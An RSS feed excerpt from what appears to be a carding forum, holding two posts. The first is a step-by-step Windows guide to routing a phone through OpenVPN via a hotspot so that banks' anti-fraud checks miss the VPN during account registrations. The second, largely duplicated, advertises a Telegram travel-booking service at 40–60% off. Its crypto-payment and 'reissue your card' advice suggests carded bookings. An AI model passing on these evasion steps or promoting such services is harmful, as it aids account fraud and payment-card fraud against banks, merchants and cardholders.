This is a useful feature to get rid of the VPN tag on Apple, when registering offices, banks - they see it well and it directly affects the forfeit points.It has nothing to do with GPS - your location will match the real one.<br />
 <br />
Cons:<br />
There are configurations that cannot be changed, and in the case of a strong anti-fraud service, it can identify you as a multi-acc.<br />
Pros:<br />
Many configurations such as WiFi Mac Address, SSID, and other useful configurations can be changed.<br />
Eliminate VPN tag on apples, don't use third party services to spoof IP on phones, tablets, computers.<br />
 <br />
Enable Hotspot / Hotspot. On different versions of Windows, the words and terms may be different, but the essence is the same.<br />
 <br />
Windows 7-10<br />
Control Panel -&gt; Network and Sharing Center -&gt; set up a new connection -&gt; set up a wireless computer-to-computer network.<br />
Windows 11<br />
In the search, write mobile hotspot , turn it on.<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/K8kHR73h/1.png" loading="lazy"  alt="[Image: 1.png]" class="mycode_img" /></div>
<br />
 Installation is simple and requires no explanation.<br />
Confirm the installation of the software for full OpenVpn operation. This is the TAP driver that will redirect our traffic from the config to the access point. Click Install<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/sD8ndBHR/2.png" loading="lazy"  alt="[Image: 2.png]" class="mycode_img" /></div>
<br />
TAP driver<br />
3. Check the adapters and their settings.<br />
Fly Control Panel -&gt; Network and Sharing Center -&gt; Change adapter settings, or search for "Network Connections".<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/tJczjf5N/3.png" loading="lazy"  alt="[Image: 3.png]" class="mycode_img" /></div>
<br />
Adapters<br />
Note immediately the presence of Adapters:<br />
Tap-Windows Adapter - This is our OpenVpn (roughly speaking).<br />
Microsoft Wi-Fi Direct Virtual - Our access point, may be called differently, but you will understand what it is after you turn the access point on/off. It will disappear and appear.<br />
Check the hotspot - click on the adapter -&gt; properties -&gt; access , synchronize with my data, if it stands otherwise.<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/T1BnSbdF/4.png" loading="lazy"  alt="[Image: 4.png]" class="mycode_img" /></div>
Correct setup of the hotspot adapter.<br />
If you have problems, disable the driver, and restart it in the Device Manager -&gt; Network Adapters. Then repeat the circle<br />
Check TAP - click on the adapter -&gt; properties -&gt; access.<br />
Tick all options + from the list of connections select our Hot Spot<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/G25D8DyD/5.png" loading="lazy"  alt="[Image: 5.png]" class="mycode_img" /></div>
Run the OpenVPN config and turn on the access point (hotspot).<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/5Nc3scXx/6.png" loading="lazy"  alt="[Image: 6.png]" class="mycode_img" /></div>
4. Check the IP of the phone.<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/X70fwwPd/7.jpg" loading="lazy"  alt="[Image: 7.jpg]" class="mycode_img" /></div>
<br />
IP on the phone<br />
I want to clarify that the IP address (rough location) you will be synchronized to the configuration. But your Location, will be your real one. And the mismatch of these indicators is the strongest fraud for the application.<br />
Good luck with your registrations.<br />
This configuration had to be done once, the following times you will have automatic WiFi sharing from config if OpenVPN is running]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Book Travel Enjoy ® via the app]]></title>
			<link>https://cardmine.cc/showthread.php?tid=80866</link>
			<pubDate>Thu, 27 Nov 2025 18:25:31 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://cardmine.cc/member.php?action=profile&uid=231506">Booking Travel Enjoy</a>]]></dc:creator>
			<guid isPermaLink="false">https://cardmine.cc/showthread.php?tid=80866</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align"><span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">From launch to travel in just a few minutes</span></span></span></div>
<br />
<img src="https://i.ibb.co/GfZ483w3/1.jpg" loading="lazy"  alt="[Image: 1.jpg]" class="mycode_img" /><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Automatic order processing and status updates.</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Book in the app – automatic order generation based on your criteria.</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">From creating an application to a paid and completed reservation, it takes anywhere from 15 minutes to several hours.</span></span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #0074d9;" class="mycode_color"><span style="font-size: large;" class="mycode_size">HOW DOES IT WORK?</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">Application description - an example of creating a reservation - the principle and automation of application processing.</span></span></span><br />
<br />
<img src="https://i.ibb.co/5hhZmLtj/2.jpg" loading="lazy"  alt="[Image: 2.jpg]" class="mycode_img" /><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">About us!</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">We are pioneers in the field of booking with significant discounts on travel services.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">You save about 40% off every trip when you book through the bot's web app.</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">A mutually beneficial partnership: you save = we earn!</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Traveling with savings without losing up to 50% on every booking is smart.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Aggregators are pointless – we pay the full booking cost for you.</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">Example to illustrate the benefits of interaction</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Maldives Hotel ⋆⋆⋆⋆ (all inclusive)</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">2 guests / chain hotel / 9+ rating from Booking.com / double overwater bungalow /</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">taxes and included hydrotransfer from and to the airport (optional).</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">— The official website price starts at &#36;6,500 (aggregators similarly charge ±&#36;200).</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">— By submitting an application through us, you pay approximately &#36;4,000.</span></span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">After submitting your application in the web app, you are assigned an order number and the status "Processing."</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">The application is immediately assigned to a manager, who will work with you until it is completed.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">The application is considered completed once the trip has taken place or the service has been successfully rendered.</span><br />
<span style="font-weight: bold;" class="mycode_b">Until this point, all paid invoices are kept safe by the agency organizers.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">After completing your reservation, please don't forget to tag us on Telegram</span><br />
<span style="font-weight: bold;" class="mycode_b">or tell your family, friends, and relatives—we offer reasonable savings and a pleasantly organized trip.</span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">Application Processing</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Processing takes up to 10 minutes.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">During this time, the manager will review the application, clarify details in the bot chat if necessary,</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">and generate an invoice.</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">After payment, the application status changes to:</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">"The order has been paid and is now being processed by the agency." You will receive your voucher shortly."</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">✔️ Launching the bot application</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Launch <a href="https://t.me/booking_travel_enjoybot" target="_blank" rel="noopener" class="mycode_url">https://t.me/booking_travel_enjoybot</a></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Contact us if the bot doesn't respond.</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Activate the Telegram bot by clicking the "Start" button at the bottom of the screen.</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">In the main menu, select "Launch application."</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">➕Create a reservation</span></span></span><br />
<br />
<img src="https://i.ibb.co/gFM0F6xb/3.gif" loading="lazy"  alt="[Image: 3.gif]" class="mycode_img" /><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Wait for the video to load—it will start automatically.</span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">➕The chatbot will answer any questions in the dialog box window.</span></span></span><br />
<br />
<img src="https://i.ibb.co/4wPxyHvc/4.gif" loading="lazy"  alt="[Image: 4.gif]" class="mycode_img" /><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Wait for the video to load—it will start automatically.</span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">If the bot doesn't respond, contact us!</span></span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #0074d9;" class="mycode_color"><span style="font-size: large;" class="mycode_size">SERVICES/CATEGORIES</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">List of services—pricing—optimal delivery times.</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">Payment Explanation</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥ A percentage is not a discount!</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥ It is calculated from the official price <a href="https://www.booking.com" target="_blank" rel="noopener" class="mycode_url">https://www.booking.com</a>.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥ Our interest = 60%.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥ You've created a reservation, and there are less than 72 hours left before check-in.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥ Accommodation cost &#36;1,000 = 100%.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥ Total: &#36;600 payment for our work / paid reservation, you receive as a voucher.</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">Required information and application form</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Convenient time to make a reservation: 10 / 3 days before your arrival date.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Selection only available on <a href="https://www.booking.com" target="_blank" rel="noopener" class="mycode_url">https://www.booking.com</a></span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Duration of stay at one hotel: up to 10 days.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Room price: from &#36;1,000.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥We do not work in the Russian Federation or the CIS.</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">The following rate options are eligible:</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥"Non-refundable" — eligible</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥"Free cancellation" — eligible</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥"Partial payment" — eligible</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥"Payment on site" — eligible</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥"Payment in advance" — eligible</span></span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Rush orders "same day" — 60% of the total booking cost.</span><br />
<span style="font-weight: bold;" class="mycode_b">Hotels in the US must be booked strictly 5 days prior to arrival.</span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">Listed destinations (discounts from 45% to 60%):</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Maldives</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Vietnam</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Thailand</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Hong Kong</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Japan</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Turkey</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥USA</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥UAE</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">Example of creating a reservation through the app</span></span></span><br />
<br />
<img src="https://i.ibb.co/gFM0F6xb/3.gif" loading="lazy"  alt="[Image: 3.gif]" class="mycode_img" /><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Wait for the video to load - it will start automatically.</span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">Check-in procedure and etiquette</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Go to the reception desk at </span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Present the passports of all guests checking in.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Show the reservation voucher pre-downloaded on your smartphone.</span></span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">For contactless check-in (often used when booking villas and apartments),</span><br />
<span style="font-weight: bold;" class="mycode_b">the chatbot will send instructions in a dialog box with a PIN or QR code for entry.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">If reception asks for a credit card, you can mention that you are using cryptocurrency.</span><br />
<span style="font-weight: bold;" class="mycode_b">Sometimes the hotel may retain a small deposit as a security deposit (minibar, spa, property).</span><br />
<span style="font-weight: bold;" class="mycode_b">The deposit is refunded upon check-out.</span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">⚠️ Important: Please reissue your card if you used it to check in at the hotel.</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">What documents do you need to bring?</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Passport</span></span><br />
<img src="https://i.ibb.co/HDjVZsNJ/6.jpg" loading="lazy"  alt="[Image: 6.jpg]" class="mycode_img" /><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Birth certificate for children</span></span><br />
<img src="https://i.ibb.co/j9kx3bHG/7.jpg" loading="lazy"  alt="[Image: 7.jpg]" class="mycode_img" /><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Voucher with number Bookings</span></span><br />
<img src="https://i.ibb.co/k6yhhDdP/8.jpg" loading="lazy"  alt="[Image: 8.jpg]" class="mycode_img" /><br />
<br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">Full range of agency services</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Book a flight — buy an airline ticket with a ~40% discount.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Rent a car — book the desired class of car for your trip for 50% off the official price.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Book your stay — hotel rooms, villas, and apartments with savings of up to 40%.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Yacht cruise on the open ocean — ships equipped with every comfort! The journey lasts several days.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">Our website - <a href="https://booking-travel-enjoy.gitbook.io/bookig-travel-enjoy" target="_blank" rel="noopener" class="mycode_url">https://booking-travel-enjoy.gitbook.io/...avel-enjoy</a></span></span></span>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align"><span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">From launch to travel in just a few minutes</span></span></span></div>
<br />
<img src="https://i.ibb.co/GfZ483w3/1.jpg" loading="lazy"  alt="[Image: 1.jpg]" class="mycode_img" /><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Automatic order processing and status updates.</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Book in the app – automatic order generation based on your criteria.</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">From creating an application to a paid and completed reservation, it takes anywhere from 15 minutes to several hours.</span></span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #0074d9;" class="mycode_color"><span style="font-size: large;" class="mycode_size">HOW DOES IT WORK?</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">Application description - an example of creating a reservation - the principle and automation of application processing.</span></span></span><br />
<br />
<img src="https://i.ibb.co/5hhZmLtj/2.jpg" loading="lazy"  alt="[Image: 2.jpg]" class="mycode_img" /><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">About us!</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">We are pioneers in the field of booking with significant discounts on travel services.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">You save about 40% off every trip when you book through the bot's web app.</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">A mutually beneficial partnership: you save = we earn!</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Traveling with savings without losing up to 50% on every booking is smart.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Aggregators are pointless – we pay the full booking cost for you.</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">Example to illustrate the benefits of interaction</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Maldives Hotel ⋆⋆⋆⋆ (all inclusive)</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">2 guests / chain hotel / 9+ rating from Booking.com / double overwater bungalow /</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">taxes and included hydrotransfer from and to the airport (optional).</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">— The official website price starts at &#36;6,500 (aggregators similarly charge ±&#36;200).</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">— By submitting an application through us, you pay approximately &#36;4,000.</span></span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">After submitting your application in the web app, you are assigned an order number and the status "Processing."</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">The application is immediately assigned to a manager, who will work with you until it is completed.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">The application is considered completed once the trip has taken place or the service has been successfully rendered.</span><br />
<span style="font-weight: bold;" class="mycode_b">Until this point, all paid invoices are kept safe by the agency organizers.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">After completing your reservation, please don't forget to tag us on Telegram</span><br />
<span style="font-weight: bold;" class="mycode_b">or tell your family, friends, and relatives—we offer reasonable savings and a pleasantly organized trip.</span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">Application Processing</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Processing takes up to 10 minutes.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">During this time, the manager will review the application, clarify details in the bot chat if necessary,</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">and generate an invoice.</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">After payment, the application status changes to:</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">"The order has been paid and is now being processed by the agency." You will receive your voucher shortly."</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">✔️ Launching the bot application</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Launch <a href="https://t.me/booking_travel_enjoybot" target="_blank" rel="noopener" class="mycode_url">https://t.me/booking_travel_enjoybot</a></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Contact us if the bot doesn't respond.</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Activate the Telegram bot by clicking the "Start" button at the bottom of the screen.</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">In the main menu, select "Launch application."</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">➕Create a reservation</span></span></span><br />
<br />
<img src="https://i.ibb.co/gFM0F6xb/3.gif" loading="lazy"  alt="[Image: 3.gif]" class="mycode_img" /><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Wait for the video to load—it will start automatically.</span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">➕The chatbot will answer any questions in the dialog box window.</span></span></span><br />
<br />
<img src="https://i.ibb.co/4wPxyHvc/4.gif" loading="lazy"  alt="[Image: 4.gif]" class="mycode_img" /><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Wait for the video to load—it will start automatically.</span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">If the bot doesn't respond, contact us!</span></span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #0074d9;" class="mycode_color"><span style="font-size: large;" class="mycode_size">SERVICES/CATEGORIES</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">List of services—pricing—optimal delivery times.</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">Payment Explanation</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥ A percentage is not a discount!</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥ It is calculated from the official price <a href="https://www.booking.com" target="_blank" rel="noopener" class="mycode_url">https://www.booking.com</a>.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥ Our interest = 60%.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥ You've created a reservation, and there are less than 72 hours left before check-in.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥ Accommodation cost &#36;1,000 = 100%.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥ Total: &#36;600 payment for our work / paid reservation, you receive as a voucher.</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">Required information and application form</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Convenient time to make a reservation: 10 / 3 days before your arrival date.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Selection only available on <a href="https://www.booking.com" target="_blank" rel="noopener" class="mycode_url">https://www.booking.com</a></span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Duration of stay at one hotel: up to 10 days.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Room price: from &#36;1,000.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥We do not work in the Russian Federation or the CIS.</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">The following rate options are eligible:</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥"Non-refundable" — eligible</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥"Free cancellation" — eligible</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥"Partial payment" — eligible</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥"Payment on site" — eligible</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥"Payment in advance" — eligible</span></span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Rush orders "same day" — 60% of the total booking cost.</span><br />
<span style="font-weight: bold;" class="mycode_b">Hotels in the US must be booked strictly 5 days prior to arrival.</span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">Listed destinations (discounts from 45% to 60%):</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Maldives</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Vietnam</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Thailand</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Hong Kong</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Japan</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Turkey</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥USA</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥UAE</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">Example of creating a reservation through the app</span></span></span><br />
<br />
<img src="https://i.ibb.co/gFM0F6xb/3.gif" loading="lazy"  alt="[Image: 3.gif]" class="mycode_img" /><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Wait for the video to load - it will start automatically.</span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">Check-in procedure and etiquette</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Go to the reception desk at </span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Present the passports of all guests checking in.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">➥Show the reservation voucher pre-downloaded on your smartphone.</span></span><br />
<br />
